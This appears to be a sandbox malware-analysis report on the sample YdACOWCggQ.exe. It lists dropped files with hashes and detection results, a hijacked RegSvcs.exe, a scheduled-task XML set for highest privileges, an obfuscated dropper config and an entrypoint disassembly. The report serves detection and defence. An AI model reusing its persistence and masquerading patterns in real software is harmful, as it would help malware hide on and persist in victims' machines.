                                                                          SHA-512:3659FAB569E5D7FF8F509EF2B0B2385EBD80114CD1ED782B19A440131FAB50EB6AB489A9A274503BB08751B5173E97E81B8931047DC1F6B7C440558B80AB34F2
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\fmkkelc.omp
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):151163464
                                                                          Entropy (8bit):7.076418205558757
                                                                          Encrypted:false
                                                                          SSDEEP:49152:EcAALhfk8v8UOvPpDnYZVOCzhK2BE1Mnu8oQLpzEwE5AhbaSpqX+FST+CJtIJlz6:A
                                                                          MD5:66D7B16F566AD4D6F73CD6083C7B1D51
                                                                          SHA1:C71715B2546908A05A28A91555534F04BDF11432
                                                                          SHA-256:440D3B688F65BD11C021206C50D7B7C4A75C7BA66BD2E1AA4137ABE65D41079A
                                                                          SHA-512:7EE084C1DA1AABE2F7FCC084B4A9C5A9E5CFB86FB4FD45BC6EE08CD3E67FE41380D8FA0F0F312EC50198DC50CE230E36127EF5931ED455D9CE61EFBD43E1A0CA
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\ggaoddlfq.pdf
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):581
                                                                          Entropy (8bit):5.484135377500105
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:97DB150F517B42A67914B55B9FCC0855
                                                                          SHA1:53FA78E1F13BB71038D02D9C8911415B5C2912C5
                                                                          SHA-256:D4FC9603286BC88744BDA31D71B8464EA7CAB510244B3C21128774513302BFC8
                                                                          SHA-512:545A19B01D8423099C1CB414B4754E10C7C1A98ABA50BBEB7330B82843BEA877DB761156CA6B306EC4A67954CAF1E9C0493E0722BB6345B19CD8678E6A7BD532
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\hmjc.jpg
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):582
                                                                          Entropy (8bit):5.508024577075607
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:DCC53F5459120236A9DD260CBCC7CFFF
                                                                          SHA1:4039FCA91DD943A269B6180906E347F44E26AD45
                                                                          SHA-256:2DD6BC5BC770D576565692E8D014611ECE5614A615B83832756959163EDA3329
                                                                          SHA-512:AAF0B1864FA1353C8BE403BA257FC86E963AA1C5C6343CD83AC9B47F4D4AD0C4DFF12589C17E4BD0DB6F626C8446332BBFE87819E2ED37709DC1DCD59909D54A
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\ipltm.pdf
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):551
                                                                          Entropy (8bit):5.404238302840432
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:239B0A24A1A86CDB9E336BAFB9671B60
                                                                          SHA1:D604B815B4C5FC72E38700E060016980CD3F013C
                                                                          SHA-256:F71F990B573AA4CC7724769C08F9EF0FD5E3897FDEB567966323E1AA5C7AAF84
                                                                          SHA-512:8214623D1FAE28F7BE93CF1F762DF3BE8475331613FA1949B643D6A739FD5EA705789499E91D1A8CBD25FA8159F0450681EB2D3977B9B698B89D1332245DBE57
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\kwhibpnou.exe
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):566
                                                                          Entropy (8bit):5.3766864975280875
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:D60ADFE8CC5346DF0C2C5A191039AFB7
                                                                          SHA1:B2760A6B3E71AA9441F771A31FA7CAB80DDB792C
                                                                          SHA-256:4D5CB8CFF9DCC0F1536CAE9299295B4422F49B8377FDAA9057427AE40D74EB8B
                                                                          SHA-512:F7CD8F6FE84970944955343E5699BDFDB05174E9CEEB3AFE2ADA12B2F2BBED4B945E8B2D16B9B7AD1A796C37DA991E3B81F284076170805CD45665873411A767
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\lueww.jpg
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):549
                                                                          Entropy (8bit):5.509794522095491
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F25CE49283A8CBCDAE2F3D447B00DE0B
                                                                          SHA1:5ED22433392F6FBD1804EF94473CF465837575AD
                                                                          SHA-256:C6B4F1EA2A48D13050C20A3D4CC3614909E694B494037432610053DA675FC627
                                                                          SHA-512:2FAEBF76B5DDD7505BBBAD4B6ED730667BBCE856C10FD476E28607B0C41E409FC661360F39607D38F5E54AA5CB6B27403E9F54A3BD918AA127FB7AF55C0094D4
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\lxvjfmbxgn.icm
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):529
                                                                          Entropy (8bit):5.417334677129549
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:B8D1527AD41B6877D1B63609604A2114
                                                                          SHA1:831D9DB5D7ED05A8397EE8A3E34C35C3DC769CE0
                                                                          SHA-256:86DAACE3C786D9AA8BBDBDA09F69456A0260A20E5AB4CFE9A02628A73A9E0AA4
                                                                          SHA-512:15DFC12B02F3D8F10A1785BD192C1DB146B7CDF12AA1B1CBC30700F24DCFEAF333A117221C45BF65225B249F88A3506C77F57B2667DD50A851DAFD32DB604D7C
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\meuuljggm.jpg
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):608
                                                                          Entropy (8bit):5.599021625489054
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:909355BA1B2ADA7E01CB81E2899B6B96
                                                                          SHA1:98ED232FB52CB179C60C6988480BB28D5B247263
                                                                          SHA-256:8ED9F9F9295D32C849D9939BEB83763955BC0C6925793FADB4A0A0735378338A
                                                                          SHA-512:C15AD4E028A05CD34F0C22B4DE80B61A12B901DE4994083C9717C9B4F3BBC1CF29431894ADFE3B7FEC934642741AD9A4226FC9EA6A2B3DA91D351387A2F61BF2
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\mmbdcs.xl
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):548
                                                                          Entropy (8bit):5.47877878102614
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:1A4DB14134A67966C903508FF04DCB28
                                                                          SHA1:612D22CDCF9CA81EBB295642346E3F0F9214D522
                                                                          SHA-256:9C66FABC8AC533B56109E3BA00591892A18B30831DE74B933532C5727E0F4AC7
                                                                          SHA-512:3B3588CC2686AE47E1AA66DB11D2EBB662D0C8F99DA8049BC1D560289D9A06E194266260D918D515B3470C7684DD85FD989050BE63CEBF731D89A6761102EDEF
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\mmuiqlcvwo.pif
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):777456
                                                                          Entropy (8bit):6.353934532007735
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:8E699954F6B5D64683412CC560938507
                                                                          SHA1:8CA6708B0F158EACCE3AC28B23C23ED42C168C29
                                                                          SHA-256:C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
                                                                          SHA-512:13035106149C8D336189B4A6BDAF25E10AC0B027BAEA963B3EC66A815A572426B2E9485258447CF1362802A0F03A2AA257B276057590663161D9D55D5B737B02
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 27%
                                                                          • Antivirus: ReversingLabs, Detection: 32%
                                                                          Joe Sandbox View:
                                                                          • Filename: Import order764536.xlsx, Detection: malicious
                                                                          • Filename: KRSEL0000056286.JPG.exe, Detection: malicious
                                                                          C:\Users\user\33920049\qhqulleu.mp3
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):57578
                                                                          Entropy (8bit):5.578086176536263
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:5DC5D3365BAE36FC41072D92D22F69CB
                                                                          SHA1:91CE48060DCCCC9806AFB9979A3A1759041036DF
                                                                          SHA-256:067820A70679BC812C16421E4F759533DD91D8124ED36966436601B1F2013C94
                                                                          SHA-512:CE2119181FCBDA7C1B08068F918C7282DEFC8AD951E129458BB75F6CC9EC4CA105482B5F4AAC4C16E425736FA45DA790D10B4ED9346A93B23B4F4F713A912A85
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\sdstvfk.ico
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):522
                                                                          Entropy (8bit):5.3732701590754415
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:84DFE2A08AFBC32793395799841D38E4
                                                                          SHA1:1E040C2A1032335F15C39C60A01343A58889B5DC
                                                                          SHA-256:AC294F23A91818659CFC3210CB058D3D9C7DDA4EF9D4CD933269C8428DED3AC5
                                                                          SHA-512:9B6B65C14499CCEB0FE8276CF33CE9B92091A7D1EB2BE8DE4497F7B418B57B70675BCF706425630D9210DF7EB1328E443F4D2F08B0CBD088DA579EAF086CE915
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\srslmbkgam.xml
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):545
                                                                          Entropy (8bit):5.5258847043058905
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:B98459F0500F47B7B583B0C519CCF3CB
                                                                          SHA1:5D8012DB878B3F72B7A5736525F587330F988A96
                                                                          SHA-256:E52F7062BE09E0B5653629D3E3738EF2B514BA971CFA25EED7BE051466EE0E26
                                                                          SHA-512:C136360F2444CBB26A4DC20B7BBE04F1040D2F796D75FCE5274F612DB869E4943C7687E7AC457C705C5925545641A891E7CE242BAA2E7A993F9849F891E8D465
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\suktleoxtu.msc
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):540
                                                                          Entropy (8bit):5.547551481633137
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:BA57AA240C24091DC77E1E2EF7A99C10
                                                                          SHA1:A013814DFDF3086EA88DBAA42D1D5269CE08DC0D
                                                                          SHA-256:619C6857EA9C69C098E3AC990BE2B99B25EC1A75821081EAD723C9EF6F718FB2
                                                                          SHA-512:498B2133DDF75BB946A763216E8E757E902F7E6AEF565DB689B02B0A02526455EADAD1C1642924E7A611537428CF2D79B8314A7A05E041963F4D9328C61C4168
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\ujhg.cpl
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):535
                                                                          Entropy (8bit):5.501943056038449
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:5F2BBE62D3EB28228186CD6964305381
                                                                          SHA1:46E019DA6F7ECE17D7500B963C80FF076B3B449C
                                                                          SHA-256:68C1BA695059F1E975FA07FF00BF77FD3B6E56EA4940E9E4AB5F7AA0FA33416E
                                                                          SHA-512:2F5AD3C6E6602C9980C530CD9380FEAB3CCDF1C2D836174F25EBF30C924D08FB958235B27C016CF2A0EEC51BACF50DAC685546778B893567AE3B51A89BEE1A4B
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\vusklntwi.docx
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):554
                                                                          Entropy (8bit):5.451419215130869
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:9D55DE9BCF880293EFC22A6EDF63D727
                                                                          SHA1:91BFA94E624F6A6C9891922931A650F3BDF014AF
                                                                          SHA-256:2EF84FFD76915FDBBAF0CC328B1AD11F7F0967D295AC7077F68C44F2DA67B75F
                                                                          SHA-512:3303BDC222A120225D36B48C6DCB24388FEEB8BC90A5FC84D8174C9CE487645D9435B31482E5D64057B52727ACC5EAF782E4B07D74FC29B32314F361186DE9EE
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\weqn.txt
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):559
                                                                          Entropy (8bit):5.441373794856656
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:E887844DDB3C6BC8C9BA7ABF0963B162
                                                                          SHA1:5B1955F3EC2985EDA50632650FB71150AD311794
                                                                          SHA-256:4E47AFF41CBC53A8C36A9F3446DB8EFCF8B4BADD7808F7B58D57BB6F4082CA1F
                                                                          SHA-512:5F856E4D003D5822FEC6CB2A4F633259073D3BDDA70C475449213247B69DB68429BBC487B6DEFB016984FDD539599C00AE54DC941E686A115DEB0C0FCF9ECB1B
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\wsxedltsm.cpl
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):604
                                                                          Entropy (8bit):5.5485404237595715
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:CEE5E8C575EC77654A20CB99615CEBF6
                                                                          SHA1:D43519CD61E556D88080FF2640150B2BBE34AE7D
                                                                          SHA-256:2A4C2DF427A70334733E5CB06304BFF74499D6850AE736F82B06A52B0D850D61
                                                                          SHA-512:573E6B89DC25A143F133993435C60719439EF51409199F433DFD12E772A4222F2DF8EEBDC155A42C102C17440A88B37B20F7BE698F368E34B174F0BD490BA0E8
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\xtax.log
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):518
                                                                          Entropy (8bit):5.459797846755074
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:32834BAFB3B1871301A6BA9BEF2C5687
                                                                          SHA1:786CD933E49C5657480DB1485B0609F8DFEC11CE
                                                                          SHA-256:DF899EAC1B5F6515CBDA8B816319FF0F89D7FF9E4FBDAEC52C75E1505105CD95
                                                                          SHA-512:A3864E623BA6AD918138D3BFA27F8F2E7AFC4F2005BA7DB655D1798CEBB5CAFDBF06D44929364CF363AEFD3F7B4AB48C37B75B3548CA711E5C6B3AB68CEC1714
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):142
                                                                          Entropy (8bit):5.090621108356562
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:8C0458BB9EA02D50565175E38D577E35
                                                                          SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                          SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                          SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                          Malicious:false
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                          C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          Process:C:\Users\user\33920049\mmuiqlcvwo.pif
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):45152
                                                                          Entropy (8bit):6.149629800481177
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:2867A3817C9245F7CF518524DFD18F28
                                                                          SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                          SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                          SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 0%
                                                                          • Antivirus: Metadefender, Detection: 0%
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: Swift copy.exe, Detection: malicious
                                                                          • Filename: KRSEL0000056286.JPG.exe, Detection: malicious
                                                                          • Filename: tT5M57z8XiwLwf5.exe, Detection: malicious
                                                                          • Filename: SecuriteInfo.com.Suspicious.Win32.Save.a.7200.exe, Detection: malicious
                                                                          • Filename: Purchase order.exe, Detection: malicious
                                                                          • Filename: 21ITQXL080104122T7.exe, Detection: malicious
                                                                          • Filename: COSCOSH SHANGHAI SHIP MANAGEMENT CO LTD.exe, Detection: malicious
                                                                          • Filename: 319-7359-01#U00a0BL#U00a0DRAFT.exe, Detection: malicious
                                                                          • Filename: HSBc20210216B1.exe, Detection: malicious
                                                                          • Filename: BANK INFORMATION.exe, Detection: malicious
                                                                          • Filename: PO.2100002.exe, Detection: malicious
                                                                          • Filename: dorlla.exe, Detection: malicious
                                                                          • Filename: dAkJsQr7A9.exe, Detection: malicious
                                                                          • Filename: QT2021154 NCX Glasurit Rev.1.exe, Detection: malicious
                                                                          • Filename: Order specification & Drawing_PDF.exe, Detection: malicious
                                                                          • Filename: payment.exe, Detection: malicious
                                                                          • Filename: SWIFT CODE.exe, Detection: malicious
                                                                          • Filename: SWIFT CODE.exe, Detection: malicious
                                                                          • Filename: TRANSFER REQUEST FORM.exe, Detection: malicious
                                                                          • Filename: swift code.exe, Detection: malicious
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                          C:\Users\user\AppData\Local\Temp\tmpB828.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1311
                                                                          Entropy (8bit):5.120237537969728
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:9CC9B31561289BF47DDBEF114BE4B6FA
                                                                          SHA1:C901987D5F8BBAD7231B7EE4A65ADB93BB0F56A5
                                                                          SHA-256:984AA44429B06B17C290376A8D741A2DAE62FE6F38EEBBF434A0781230686097
                                                                          SHA-512:075F148FDD9187FDD6BA56D1CD3D81641FE8D8F9FBA903F98B307463B4BCDC77556B542CFD73C9BC2C34D364245D5B8080DE69DC968DE9070D44FE180741D4FC
                                                                          Malicious:true
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:76413EBF84A4F46D01F8C8CE608686D8
                                                                          SHA1:8B1633D1647DDB8EB542F3E046FA47C734A7CAA3
                                                                          SHA-256:0CE3B1E05B72CFCD8DE944495B2A4CF5EF3B10B99D6D0D998A3BE6A042287639
                                                                          SHA-512:0B9923CE31C74E61A831CCBD3E8C6B79FE78FF7627EABA940D04E00C28A06094EC68E5BC2AEE389854A843DBAC9BD30C74F9E589B861C2441BBDFD18E39E289E
                                                                          Malicious:true
                                                                          Preview: .~..{..H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):48
                                                                          Entropy (8bit):4.556127542695029
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:71C86F4534ED6EA4C1E9A785F2EB0A92
                                                                          SHA1:D065F0540580FC2E0ACD365784FD5A60F8235829
                                                                          SHA-256:DBC475B81DC4AACF70235516B8FB463D4FB170C3E72E647C0BA2A30D3B9EC4E3
                                                                          SHA-512:6D97D624C0A2B3D3B8D51A4F2502B8874E59E29538AD0477F1DE32FEEDAE38890F68532B591EEF0FA0DB23CD4929890DB256ACB8E4B73F6F790BB11C13473688
                                                                          Malicious:false
                                                                          Preview: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
                                                                          C:\Users\user\temp\qhqulleu.mp3
                                                                          Process:C:\Users\user\33920049\mmuiqlcvwo.pif
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):95
                                                                          Entropy (8bit):5.071141961542051
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:E241BA8C7BF12A7128E7C0AD28348930
                                                                          SHA1:ACFC821D16BAB7535369917F41BB21ADA15E3BC0
                                                                          SHA-256:0B64183C8B6E30C78D7EB1997E3686A1CE832B3CB0092F09CA76BA5FD5EE0B9C
                                                                          SHA-512:26A78974A6794751B052B58EB01C3BF9030E1116050C24A86326E31F1F11E1289860AC915F055B13F29AF3D0BED1E73CE9C5EAFC1196DD1C9CACA9C2E5602376
                                                                          Malicious:false
                                                                          Preview: [S3tt!ng]..stpth=%userprofile%..Key=Windows element..Dir3ctory=33920049..ExE_c=mmuiqlcvwo.pif..
                                                                          \Device\ConDrv
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):215
                                                                          Entropy (8bit):4.911407397013505
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:623152A30E4F18810EB8E046163DB399
                                                                          SHA1:5D640A976A0544E2DDA22E9DF362F455A05CFF2A
                                                                          SHA-256:4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
                                                                          SHA-512:1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
                                                                          Malicious:false
                                                                          Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.832162830296474
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:YdACOWCggQ.exe
                                                                          File size:1073384
                                                                          MD5:b866823e1f8f4a52376bd108c457dd78
                                                                          SHA1:fe99849ec27630463080445337798eeba8000a02
                                                                          SHA256:ebe1bb18a77cf0b34d3ad06919a9adfff2aa69cfafa5b96b670534b890e3e2a8
                                                                          SHA512:fd1732ca7dc310395581d835ea3df1e7ad664c75c9c7f68ba55c0b2e521383a0c8781b490f7cc05428d6e534b356a585bf11b57e57808cc37ea08dabf4a09e13
                                                                          SSDEEP:24576:rAOcZEhU3Pv6cxzVQ5WP1TKyENXWPI1sDx52gWbh9dlfQ:tEicRPwZ1sDxIrtG
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

                                                                          File Icon

                                                                          Icon Hash:b491b4ecd336fb5b

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x41e1f9
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          call 00007FE558994C1Fh
                                                                          jmp 00007FE558994613h
                                                                          cmp ecx, dword ptr [0043D668h]
                                                                          jne 00007FE558994785h
                                                                          ret
                                                                          jmp 00007FE558994D95h
                                                                          ret
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 00433068h
                                                                          mov dword ptr [ecx], 00434284h
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          push dword ptr [ebp+08h]
                                                                          mov esi, ecx
                                                                          call 00007FE558987B91h
                                                                          mov dword ptr [esi], 00434290h
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          and dword ptr [ecx+04h], 00000000h
                                                                          mov eax, ecx
                                                                          and dword ptr [ecx+08h], 00000000h
                                                                          mov dword ptr [ecx+04h], 00434298h
                                                                          mov dword ptr [ecx], 00434290h
                                                                          ret
                                                                          lea eax, dword ptr [ecx+04h]
                                                                          mov dword ptr [ecx], 00434278h
                                                                          push eax
                                                                          call 00007FE55899792Dh
                                                                          pop ecx
                                                                          ret
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push esi
                                                                          mov esi, ecx
                                                                          lea eax, dword ptr [esi+04h]
                                                                          mov dword ptr [esi], 00434278h
                                                                          push eax
                                                                          call 00007FE558997916h
                                                                          test byte ptr [ebp+08h], 00000001h
                                                                          pop ecx
                                                                          je 00007FE55899478Ch
                                                                          push 0000000Ch
                                                                          push esi
                                                                          call 00007FE558993D4Fh
                                                                          pop ecx
                                                                          pop ecx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebp
                                                                          retn 0004h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          sub esp, 0Ch
                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                          call 00007FE5589946EEh
                                                                          push 0043A410h
                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                          push eax
                                                                          call 00007FE558997015h
                                                                          int3
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          sub esp, 0Ch

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
